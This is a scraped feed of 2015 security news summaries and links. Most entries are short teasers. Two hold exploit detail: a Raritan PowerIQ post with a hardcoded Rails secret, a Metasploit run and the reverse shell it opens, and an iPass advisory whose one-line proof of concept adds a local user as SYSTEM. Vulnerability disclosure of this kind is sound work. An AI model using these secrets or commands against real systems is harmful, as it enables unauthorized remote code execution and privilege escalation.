Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Capstone disassembly framework 3.0.2 is out!

March 11, 2015, 4:20 pm
$
0
0
e are happy to announce the stable version 3.0.2 of Capstone disassembly framework!

The source code is available in zip and tar.gz formats, or at tagname 3.0.2 in our Github repo.

more here...........http://capstone-engine.org/Version-3.0.2.html
Search

Inverted WordPress Trojan

March 12, 2015, 2:47 am
$
0
0
Trojan (or trojan horse) is software that does (or pretends to be doing) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (usually pirated) which may have backdoors, or send out spam, create doorways, inject hidden links or malware. The trojan model is easy to understand: package malware inside something useful and have webmasters install it themselves.

This week I came across something that I can call an inverted trojan — malware (installed without webmaster consent) that added useful features to WordPress.

This is a typical Black Hat SEO hack that has affected lots of WordPress site lately. It creates doorways for pharmaceutical keywords and redirects visitors that come search engines to third-party sites. But the way the doorway code work is quite interesting.

more here.......http://blog.sucuri.net/2015/03/inverted-wordpress-trojan.html

Raritan PowerIQ known session secret

March 12, 2015, 2:48 am
$
0
0
Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a0537.

This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting

                                              Required  Description
   ----             ---------------

                                              --------  -----------
   COOKIE_NAME

                                               no        The name of the
session cookie
   DIGEST_NAME      SHA1

                                               yes       The digest type
used to HMAC the session cookie
   HTTP_METHOD      GET

                                              yes       The HTTP request
method (GET, POST, PUT typically work)
   Proxies

                                               no        A proxy chain of
format type:host:port[,type:host:port][...]
   RAILSVERSION     3

                                              yes       The target Rails
Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20

                                               yes       The target address
   RPORT            443

                                              yes       The target port
   SALTENC
 BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==
 yes       The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8

                                               yes       The signed
encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537

                                               yes       The secret_token
(Rails3) or secret_key_base (Rails4) of the application (needed to sign the
cookie)
   TARGETURI        /login/login

                                               yes       The path to a
vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true

                                               no        Only send the
payload if the session cookie is validated
   VHOST

                                               no        HTTP server
virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729)
at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)


Authored by Brandon Perry

Introducing dnsdist: DNS, abuse- and DoS-aware query distribution for optimal performance

March 12, 2015, 2:52 am
$
0
0
Over the years, PowerDNS users have frequently asked us about our preferred DNS load balancing solution, and we’ve never had a satisfying answer for that. Users of dedicated hardware often tell us that vendors spend most of their time and effort on balancing HTTP, and frequently deliver substandard or even buggy DNS functionality.

In terms of software, one big PowerDNS deployment is happy with OpenBSD relayd, and it indeed does look powerful. Other operators have deployed keepalived, which is very strong from a networking standpoint, but does not offer a lot of DNS specifics.

But all in all, we never found any load balancing solution for DNS that made people truly happy.

more here..........http://blog.powerdns.com/2015/03/11/introducing-dnsdist-dns-abuse-and-dos-aware-query-distribution-for-optimal-performance/

Defending Against PoS RAM Scrapers

March 12, 2015, 2:55 am
$
0
0
Stealing payment card data has become an everyday crime that yields quick monetary gains. Attackers aim to steal the data stored in the magnetic stripe of payment cards, optionally clone the cards, and run charges on the accounts associated with them. The topic of PoS RAM scraper malware always prompts businesses and retailers to ask two important questions: “How do I protect myself?” and “What new technologies are vendors introducing to protect businesses and consumers?”

This blog entry seeks to answer these questions by discussing a PoS Defense Model and new technologies that can protect businesses and consumers from PoS RAM attacks.

more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/

Hijacking SSH to Inject Port Forwards

March 12, 2015, 3:00 am
$
0
0
During red team post exploitation I sometimes run into jump boxes leading to test environments, production servers, DMZs, or other organizational branches. As these systems are designed to act as couriers of outbound traffic, hijacking SSH sessions belonging to other users can be useful. So what do you do when you have full control over a jump box and want to leverage another user's outbound SSH access to tunnel into another segment? What if you don't have passwords, keys, shouldn't drop binaries, and SSH is protected by 2-factor authentication? Roll up your sleeves and trust your command line Kung Fu!

This post will cover two approaches to hijacking SSH sessions, without credentials, with the goal inserting dynamic port forwards on the fly. The two stages at which I'll approach hijacking sessions are: (1) upon session creation, and (2) when a live SSH session exists inside of screen (more common than you'd think). In each case our final goal is to create a tunnel inside another user's active session in order to gain access to outbound routes on the terminating SSHD host.

more here..........http://0xthem.blogspot.co.uk/2015/03/hijacking-ssh-to-inject-port-forwards.html

ARMPwn

March 12, 2015, 3:03 am
$
0
0
Repository to train/learn memory corruption on the ARM platform. here....https://github.com/saelo/armpwn

Windows Event Log Driven Back Doors

March 12, 2015, 8:48 am
$
0
0
Well it's about time to get that white hat a little dirty.

None of this is original ideas, I've heard of this being done in theory of "oh, you know what would make a good persistence idea?" but I've never actually seen anything implement it. So I decided to do that.
*EDIT In fact this is exactly where I saw it first. SANS Wipe the HardDrive written by Mark Baggett and inspired by Jake Williams.

Let us take this from the metaphysical to the physical here.......http://blakhal0.blogspot.gr/2015/03/windows-event-log-driven-back-doors.html
Search

'Locked Out'

March 12, 2015, 8:50 am
$
0
0
The evolution of encrypters and user errors here........https://securelist.com/analysis/publications/68960/locked-out/

CYCLICAL REDUNDANCY CHECK – AN EXPLANATION FOR THE LAYMAN

March 12, 2015, 8:51 am
$
0
0
During a recent audit, I ran into something interesting while reviewing a script as part of a control related to data integrity. The script performed a simple ETL function (Extract Transform & Load) on tables of data sent and retrieved over a secure FTP connection from their customer’s server.

As I wallowed in geek heaven, deconstructing the code and the intricacies of their ETL process, I ran into a really groovy algorithm. I asked the author of the script what the algorithm was for and he said it performed a Cyclical Redundancy Check (CRC).

I remembered reading up on CRC checks while studying for the CISA, but had never encountered one in the wild. I figured now is a better time than any to dive in and learn more!

more here.......http://www.risk3sixty.com/2015/03/12/cyclical-redundancy-check-an-explanation-for-the-layman/

QEMU + GDB + PE IMPORTS

March 12, 2015, 8:53 am
$
0
0
QEMU implements a GDB server making it possible to attach to the operating system from outside the virtual machine, via the target remote command of the debugger. When analysing a Windows malware, this method is useful to bypass any anti-debug technique but has a big drawback: GDB has no knowledge of the underlying system and therefore cannot display any symbol to ease the analysis. As an example, let’s see how to add information from the import table here......http://www.lexsi-leblog.com/cert-en/qemu-gdb-pe-imports.html

Who got the bad SSL Certificate? Using tshark to analyze the SSL handshake.

March 12, 2015, 8:54 am
$
0
0
Ever wonder if any of your users connect to sites with bad SSL certificates? I ran into this issue recently when debugging some SSL issues, and ended up with this quick tshark and shell script trick to extract the necessary information from a packet capture here......https://isc.sans.edu/forums/diary/Who+got+the+bad+SSL+Certificate+Using+tshark+to+analyze+the+SSL+handshake/19455/

VBA Maldoc: We Don’t Want No Stinkin Sandbox/Virtual PC

March 12, 2015, 8:58 am
$
0
0
Today I got an interesting maldoc sample (77f3949c2130b268bb18061bcb483d16): it will not activate if it runs in a sandboxed or virtualized environment.

The following statements are executed right before the malicious actions begin here....http://blog.didierstevens.com/2015/03/11/vba-maldoc-we-dont-want-no-stinkin-sandboxvirtual-pc/

New Facebook Worm Variant Leverages Multiple Cloud Services

March 12, 2015, 8:59 am
$
0
0
Social networks are particularly interesting for malware authors because they can be leveraged to spread an infection starting with a single person.

Patient zero can transmit the piece of malware to all of his contacts which in turn do the same, quickly becoming viral and affecting hundreds of thousands of people.

We came across a worm that we think belongs to the Kilim family and whose purpose is to compromise a user and spread via Facebook.

more here........https://blog.malwarebytes.org/fraud-scam/2015/03/new-facebook-worm-variant-leverages-multiple-cloud-services/

Pythons Restkit HTTP resource kit does not validate TLS which means it's HTTPS handling is broken and insecure

March 12, 2015, 9:15 am
$
0
0 
Pythons Restskit[1][2][3][4] does not properly validate TLS
(see https://github.com/benoitc/restkit/issues/140). It appears to simply use
ssl.wrap_socket from the standard library, which does not do any validation
by default. This can be verified by doing:

>>> from restkit import request
>>> r = request("https://tv.eurosport.com/";)
>>> r.body_string()
    '<HTML><HEAD>...'



[1] https://github.com/benoitc/restkit
[2] https://pypi.python.org/pypi/restkit
[3] http://restkit.readthedocs.org/en/latest/
[4] https://benoitc.github.io/restkit/index.html

---
Authored by Donald Stufft
Search

Paper: Control Flow Graph Based Attacks

March 12, 2015, 9:58 am
$
0
0
This report addresses de-obfuscation on programs. The targeted
obfuscation scheme is the control flow flattening, which is an obfuscation
method focusing on hiding the control flow of a program. This scheme
introduces a special block named dispatcher into the program. The
control flow of the program is reconstructed to be directed back to the
dispatcher whenever the execution of a basic block ends. By doing
this, in the flattened program, each basic block could be recognized as
a precursor or a successor of any other basic blocks. While the real
control flow of the program is merely disclosed during the execution of
the program.
This report aims to remove the dispatcher added in the flattened
program and rebuild the control flow of its original program. To achieve
the targets, this report presents a de-obfuscation model based on the
Control Flow Graph of an obfuscated program. The de-flattening model
makes use of both static analysis and dynamic analysis.

more here...........http://www.diva-portal.org/smash/get/diva2:762870/FULLTEXT01.pdf

How secure are you online? The Cyber Security Month Security test!

March 12, 2015, 10:03 am
$
0
0
Welcome to the Network and Information Security quiz!
This tool is designed to help you update your internet security knowledge, begin whenever you feel ready. It will take max 10 minutes here..........http://cybersecuritymonth.eu/references/quiz-demonstration

tcpdump Version: 4.7.3 / 1.7.2 is latest release

March 12, 2015, 11:26 am
$
0
0
A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture here..........http://www.tcpdump.org/#latest-release

MSA-2015-03: iPass Mobile Client Service Local Privilege Escalation

March 12, 2015, 1:34 pm
$
0
0
Mogwai Security Advisory MSA-2015-03
----------------------------------------------------------------------
Title:              iPass Mobile Client service local privilege escalation
Product:            iPass Mobile Client
Affected versions:  iPass Mobile Client 2.4.2.15122 (Newer version might be also
affected)
Impact:             medium
Remote:             no
Product link:       http://www.ipass.com/laptops/
Reported:           11/03/2015
by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)


Vendor's Description of the Software:
----------------------------------------------------------------------
The iPass Open Mobile client for laptops is lightweight and always on.
It provides easy, seamless connectivity across iPass, customer, and third-party
networks, and allows you to mix and match carrier networks without disrupting
your users.

The iPass Open Mobile client for laptops allows organizations to provide
granular
options for how employees connect to iPass Wi-Fi (the iPass Mobile Network),
campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single
platform to manage all connections. Open Mobile also enables cost and security
controls that provide virtual private network (VPN) integration options; mobile
broadband 3G/4G usage controls for both data roaming and data usage; endpoint
integrity verification that checks the security of the device at the point of
connection; and several additional options for setting network connection and
restriction policies. Insight into an organizations mobility usage is provided
through user and device activity and summary reports as well as mobile broadband
usage reports.
-----------------------------------------------------------------------

Vendor response:
-----------------------------------------------------------------------
"We do not consider this a vulnerability as it is how the product was designed"

Business recommendation:
-----------------------------------------------------------------------
Disable the iPass service unless really required


-- CVSS2 Ratings ------------------------------------------------------

CVSS Base Score: 5.6
Impact Subscore: 7.8
Exploitability Subscore: 3.9
CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N)
-----------------------------------------------------------------------


Vulnerability description:
----------------------------------------------------------------------
The iPass Open Mobile Windows Client utilizes named pipes for interprocess
communication. One of these pipes accepts/forwards commands to the iPass
plugin subsystem.

A normal user can communicate with this pipe through the command line client
EPCmd.exe which is part of the iPass suite. A list of available commands can
be displayed via "System.ListAllCommands".

The iPass pipe provides a "iPass.EventsAction.LaunchAppSysMode" command which
allows to
execute arbitrary commands as SYSTEM. This can be abused by a normal user to
escalate
his local privileges.

Please note that this issue can also be exploited remotely in version
2.4.2.15122 as
the named pipe can also be called via SMB. However according to our information,
the pipe is no longer remotely accessible in current versions of the iPass
Mobile
client.


Proof of concept:
----------------------------------------------------------------------

The following EPCmd command line creates a local user "mogwai" with password
"mogwai":

EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c
net user mogwai mogwai /ADD;;

Disclosure timeline:
----------------------------------------------------------------------
10/03/2015: Requesting security contact from iPass sales
10/03/2015: Sales responded, will forward vulnerability information to the
development
11/03/2015: Sending vulnerability details
11/03/2015: iPass asks which customer we represent
11/03/2015: Responding that we don't represent any iPass customer
12/03/2015: iPass responded, wont fix, says that the product works as designed


Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab


----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)

info@mogwaisecurity.de

Compromised Root Cause Analysis Model Revisited

March 12, 2015, 11:52 am
$
0
0
How? The one question that is easy to ask but can be very difficult to answer. It's the question I kept asking myself over and over. Reading article after article where publicized breaches and compromises were discussed. Each article alluded to the answer about how the breach or compromise occurred in the first place but each one left something out. Every single one left out the details that influenced their conclusions. As a result, I was left wondering how they figure out how the attack occurred in the first place. It was the question everyone alluded to and everyone said to perform root cause to determine the answer. They didn’t elaborate on how to actually do root cause analysis though. Most incident response literature echoes the same sentiment; do root cause analysis while omitting the most critical piece explaining how to do it.  I asked my question to a supposed "incident responder" and their response was along the lines "you will know it when you see it." Their answer along with every other answer on the topic was not good enough. What was needed was a repeatable methodical process one can use to perform root cause analysis. The type of methodical process found in the Compromise Root Cause Analysis Model.


more here...........http://journeyintoir.blogspot.com/2015/03/compromised-root-cause-analysis-model.html
Viewing all 8064 articles
Browse latest View live
Search